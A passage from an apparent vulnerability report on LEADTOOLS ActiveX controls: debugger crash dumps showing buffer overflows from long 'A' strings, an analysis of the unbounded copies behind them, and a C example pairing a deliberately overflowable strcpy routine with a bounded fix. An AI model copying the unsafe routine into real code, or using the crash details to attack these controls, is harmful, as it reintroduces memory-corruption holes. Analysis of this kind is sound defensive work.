1006B0C 100332C   
100332C 1003105   
1003105 1003076   
1003076 1002F16   
1002F16 KERNEL32.7C817077   
  
  
Registers:  
--------------------------------------------------  
EIP 7C919084 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
EAX 02A72100 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
EBX 41414141  
ECX 00004141  
EDX 02A70168 -> 00000000  
EDI 41414141  
ESI 02A720F8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
EBP 0013B824 -> 0013B8A8  
ESP 0013B608 -> 0000001C  
  
  
Block Disassembly:  
--------------------------------------------------  
7C91906D MOV [EBP-25],AL  
7C919070 LEA EAX,[ESI+8]  
7C919073 MOV EDI,[EAX]  
7C919075 MOV [EBP-1E4],EDI  
7C91907B MOV EBX,[ESI+C]  
7C91907E MOV [EBP-164],EBX  
7C919084 MOV ECX,[EBX] <--- CRASH  
7C919086 CMP ECX,[EDI+4]  
7C919089 JNZ 7C92CC59  
7C91908F CMP ECX,EAX  
7C919091 JNZ 7C92CC59  
7C919097 PUSH ESI  
7C919098 PUSH DWORD PTR [EBP-1C]  
7C91909B CALL 7C910684  
7C9190A0 MOV [EBX],EDI  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 02A70000 -> 000000C8  
EBP+12 50000161  
EBP+16 0000001C  
EBP+20 02A70000 -> 000000C8  
EBP+24 00000000  
EBP+28 02A70000 -> 000000C8  
  
  
Stack Dump:  
--------------------------------------------------  
13B608 1C 00 00 00 00 00 A7 02 01 00 00 00 00 00 00 00 [................]  
13B618 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]  
13B628 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]  
13B638 00 00 00 00 00 00 00 00 41 41 41 41 00 00 00 00 [................]  
13B648 00 00 00 00 00 00 00 00 00 60 13 00 00 00 14 00 [.........`......]  
  
  
  
Exception Code: BREAKPOINT  
Disasm: 7C90120E INT3  
  
Seh Chain:  
--------------------------------------------------  
1 7C90E920 ntdll.dll  
2 7C90E920 ntdll.dll  
3 7C90E920 ntdll.dll  
4 7C839AD8 KERNEL32.dll  
  
  
Called From Returns To   
--------------------------------------------------  
ntdll.7C90120F ntdll.7C95F38C   
ntdll.7C95F38C ntdll.7C96E507   
ntdll.7C96E507 ntdll.7C96F75E   
ntdll.7C96F75E ntdll.7C94BC4C   
ntdll.7C94BC4C ntdll.7C927573   
ntdll.7C927573 ltisi11n.AA69F4   
ltisi11n.AA69F4 VBSCRIPT.733015F2   
VBSCRIPT.733015F2 VBSCRIPT.7331EEE1   
VBSCRIPT.7331EEE1 VBSCRIPT.7331F192   
VBSCRIPT.7331F192 VBSCRIPT.7331F632   
VBSCRIPT.7331F632 VBSCRIPT.73321CB3   
VBSCRIPT.73321CB3 SCROBJ.5CE448DD   
SCROBJ.5CE448DD SCROBJ.5CE49EEA   
SCROBJ.5CE49EEA SCROBJ.5CE49E41   
SCROBJ.5CE49E41 1013CE7   
1013CE7 1006B0C   
1006B0C 100332C   
100332C 1003105   
1003105 1003076   
1003076 1002F16   
1002F16 KERNEL32.7C817077   
  
  
Registers:  
--------------------------------------------------  
EIP 7C90120F -> 000B0041  
EAX 02A71EF0 -> 000B0041  
EBX 02A720E4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
ECX 7C91EAD5 -> FF0014C2  
EDX 0013EECE -> EEF4000A  
EDI 000001EC  
ESI 02A71EF0 -> 000B0041  
EBP 0013F0D4 -> 0013F0EC  
ESP 0013F0D0 -> 7C96E139  
  
  
Block Disassembly:  
--------------------------------------------------  
7C9011FF TEST BYTE PTR [ESI+10],10  
7C901203 JE 7C90FEF6  
7C901209 POP ESI  
7C90120A LEAVE  
7C90120B RETN 4  
7C90120E INT3  
7C90120F RETN <--- CRASH  
7C901210 MOV EDI,EDI  
7C901212 INT3  
7C901213 RETN  
7C901214 MOV EDI,EDI  
7C901216 MOV EAX,[ESP+4]  
7C90121A INT3  
7C90121B RETN 4  
7C90121E MOV EAX,FS:[18]  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 02A71EF0 -> 000B0041  
EBP+12 02A71EF0 -> 000B0041  
EBP+16 02A70000 -> 000000C8  
EBP+20 02A71EF0 -> 000B0041  
EBP+24 0013F100 -> 0013F174  
EBP+28 7C96E507 -> 3374C084  
  
  
Stack Dump:  
--------------------------------------------------  
13F0D0 39 E1 96 7C EC F0 13 00 8C F3 95 7C F0 1E A7 02 [................]  
13F0E0 F0 1E A7 02 00 00 A7 02 F0 1E A7 02 00 F1 13 00 [................]  
13F0F0 07 E5 96 7C 00 00 00 00 00 00 A7 02 F8 1E A7 02 [................]  
13F100 74 F1 13 00 5E F7 96 7C 00 00 A7 02 F0 1E A7 02 [t...^...........]  
13F110 14 F9 96 7C 00 00 A7 02 F8 1E A7 02 60 00 00 40 [............`...]  
  
  
  
Exception Code: ACCESS_VIOLATION  
Disasm: 7C96E478 CMP BYTE PTR [EBX+7],FF  
  
Seh Chain:  
--------------------------------------------------  
1 7C90E920 ntdll.dll  
2 7C90E920 ntdll.dll  
3 7C839AD8 KERNEL32.dll  
4 7C90E920 ntdll.dll  
5 7C839AD8 KERNEL32.dll  
6 7C839AD8 KERNEL32.dll  
  
  
Called From Returns To   
--------------------------------------------------  
ntdll.7C96E478 ntdll.7C96FA1D   
ntdll.7C96FA1D ntdll.7C94D281   
ntdll.7C94D281 KERNEL32.7C834D23   
KERNEL32.7C834D23 LTKRN11n.2001087F   
LTKRN11n.2001087F ntdll.7C913A43   
ntdll.7C913A43 KERNEL32.7C80C136   
KERNEL32.7C80C136 KERNEL32.7C80B72F   
  
  
Registers:  
--------------------------------------------------  
EIP 7C96E478  
EAX FFFFFFF8  
EBX FFFFFFF8  
ECX 00150000 -> 000000C8  
EDX 00150608 -> 7C97E5A0  
EDI 00000000  
ESI 00150000 -> 000000C8  
EBP 00FFFD9C -> 00FFFDEC  
ESP 00FFFD94 -> 00150000  
  
  
Block Disassembly:  
--------------------------------------------------  
7C96E468 PUSH EBX  
7C96E469 MOV EBX,[EBP+C]  
7C96E46C TEST EBX,EBX  
7C96E46E PUSH ESI  
7C96E46F MOV ESI,[EBP+8]  
7C96E472 JE 7C96E53E  
7C96E478 CMP BYTE PTR [EBX+7],FF <--- CRASH  
7C96E47C JNZ SHORT 7C96E4BC  
7C96E47E CMP BYTE PTR [ESI+586],2  
7C96E485 JNZ SHORT 7C96E48F  
7C96E487 MOV EAX,[ESI+580]  
7C96E48D JMP SHORT 7C96E491  
7C96E48F XOR EAX,EAX  
7C96E491 TEST EAX,EAX  
7C96E493 JE 7C96E53E  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 00150000 -> 000000C8  
EBP+12 FFFFFFF8  
EBP+16 7C96FADC -> Asc: RtlGetUserInfoHeap  
EBP+20 00000000  
EBP+24 00000000  
EBP+28 00000003  
  
  
Stack Dump:  
--------------------------------------------------  
FFFD94 00 00 15 00 01 00 00 00 EC FD FF 00 1D FA 96 7C [................]  
FFFDA4 00 00 15 00 F8 FF FF FF DC FA 96 7C 00 00 00 00 [................]  
FFFDB4 00 00 00 00 03 00 00 00 6C FE FF 00 8F 04 44 7E [........l.....D.]  
FFFDC4 F8 FF FF FF 00 00 15 00 5B 21 00 01 02 04 00 00 [........[.......]  
FFFDD4 B0 FD FF 00 00 00 00 00 40 FE FF 00 20 E9 90 7C [................]  
  
  
  
ApiLog  
--------------------------------------------------  
  
***** Installing Hooks *****  
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)  
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)  
Debug String Log  
--------------------------------------------------  
  
HEAP[wscript.exe]:  
Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec  
  
  
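The BrowseDir (lttmb11n.ocx) and DriverName (ltisi11n.ocx) logs show the same defect in two buffers. In BrowseDir the call at AC113F copies the script's string into a stack-local buffer at ESP+68 and only afterwards measures it (the 7C80BE74 loop that reads a byte, increments and tests for NUL is lstrlenA's shape) and tests the last byte for a trailing backslash at AC115A (CMP BYTE PTR [ECX+EAX-1],5C). With 4116 bytes of "A" the copy runs past the buffer and over the argument slot at ESP+7B4, so lstrlenA faults on 41414141 (handled inside KERNEL32, returning 0) and the backslash check faults on the same bogus pointer. In DriverName the byte-copy loop at 7C80BEB7..7C80BEBF (lstrcpyA's shape) writes 65535 bytes into a heap block until EDX reaches the end of the committed region at 02A73000; the later ntdll faults and the debug string "Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec" record the 0x1EC-byte allocation being overrun. The C below is an added illustration of that copy-then-check pattern beside a bounded replacement. It is not LEADTOOLS code: the buffer size PATH_CAP and the names browse_dir_unsafe, browse_dir_safe, probe_with_fill and normalizes_to are assumptions chosen for the example; the real buffer sizes are not stated on the page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical capacity of the fixed buffer the control copies the path into. */
#define PATH_CAP 260

/* Length of s, scanning at most cap bytes (avoids a dependence on strnlen). */
static size_t bounded_len(const char *s, size_t cap)
{
    size_t n = 0;
    while (n < cap && s[n] != '\0')
        n++;
    return n;
}

/* The shape the disassembly shows: copy the caller's string into a fixed
 * buffer (lstrcpyA), measure it (lstrlenA), test the last byte for '\\' and
 * append one if missing. Nothing compares the length with the buffer, so a
 * 4116-byte argument writes past `path` and over the saved arguments above it.
 * Only ever call this with a short path; it is here to show the pattern. */
void browse_dir_unsafe(const char *dir)
{
    char path[PATH_CAP];
    strcpy(path, dir);                          /* lstrcpyA: unbounded */
    size_t len = strlen(path);                  /* lstrlenA */
    if (len == 0 || path[len - 1] != '\\')
        strcat(path, "\\");                     /* trailing backslash */
    printf("unsafe: %s\n", path);
}

/* Bounded replacement: measure first, reject anything that cannot fit with
 * the separator and terminator, and only then copy. 0 on success, -1 if rejected. */
int browse_dir_safe(const char *dir, char *out, size_t cap)
{
    if (dir == NULL || out == NULL || cap < 3)
        return -1;
    size_t len = bounded_len(dir, cap);
    if (len == 0 || len >= cap - 1)             /* room for '\\' and NUL */
        return -1;
    memcpy(out, dir, len);
    if (out[len - 1] != '\\')
        out[len++] = '\\';
    out[len] = '\0';
    return 0;
}

/* Feed n bytes of 'A' (the fuzzer's payload shape) to the bounded routine and
 * report its return code: -1 for the 4116- and 65535-byte cases from the log. */
int probe_with_fill(size_t n)
{
    char out[PATH_CAP];
    char *buf = malloc(n + 1);
    if (buf == NULL)
        return -2;
    memset(buf, 'A', n);
    buf[n] = '\0';
    int rc = browse_dir_safe(buf, out, sizeof out);
    free(buf);
    return rc;
}

/* 1 when the bounded routine accepts `in` and produces exactly `want`. */
int normalizes_to(const char *in, const char *want)
{
    char out[PATH_CAP];
    return browse_dir_safe(in, out, sizeof out) == 0 && strcmp(out, want) == 0;
}

int main(void)
{
    browse_dir_unsafe("C:\\Temp");              /* harmless with a short path */
    printf("C:\\Temp   -> %s\n", normalizes_to("C:\\Temp", "C:\\Temp\\") ? "C:\\Temp\\" : "rejected");
    printf("4116 x A  -> rc=%d\n", probe_with_fill(4116));
    printf("65535 x A -> rc=%d\n", probe_with_fill(65535));
    return 0;
}
```

The same bounded routine covers the heap case: whether the destination is a stack array or a 0x1EC-byte heap block, the check that matters is the one against the destination's capacity, made before the first byte is written, and a script-supplied BSTR must be treated as unbounded until that check has passed.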